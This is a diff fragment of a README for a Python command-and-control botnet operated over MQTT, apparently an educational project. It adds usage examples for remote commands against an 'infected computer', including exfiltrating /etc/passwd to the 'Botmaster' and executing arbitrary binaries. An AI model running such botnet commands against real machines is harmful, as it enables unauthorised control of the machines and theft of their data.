JakubTehlar/BotNet_MQTT/README.md

 | --exec-binary BIN| Execute the specified binary on the bot                            | python bot/controller.py --exec-binary /usr/bin/ps |

 You can only use one command option at a time.
 See the source code for more advanced usage.

+#### Examples
+- Ping the bot
+    ```bash
+    python bot/bot.py --announce
+    ```
+- List users currently present on the infected computer
+    ```bash
+    python bot/bot.py --list-users
+    ```
+- List directories in the specified path (Path should be absolute)
+    ```bash
+    python bot/bot.py --list-dir /tmp/
+    ```
+- Get the user ID of the Bot (the output of the `id` command)
+    ```bash
+    python bot/bot.py --user-id
+    ```
+- Copy a file from the infected computer to Botmaster's specified by path (path should be absolute and bot should have permissions to that path).
+Note: In this, not very wise implementation is the file sent directly in one packet without splitting it into chunks.
+The output on Botmaster's machine is via console, which is also not very fortunate.
+    ```bash
+    python bot/bot.py --copy-file /etc/passwd
+    ```
+- Execute a binary specified by path (Path should be absolute and the bot should have permissions to run the binary; binary should be executable)
+    ```bash
+    python bot/bot.py --exec-binary /usr/bin/ps
+    ```
+- Kill the bot
+    ```bash
+    python bot/bot.py --kill
+    ```

 ## Security Features

 - HMAC authentication for all messages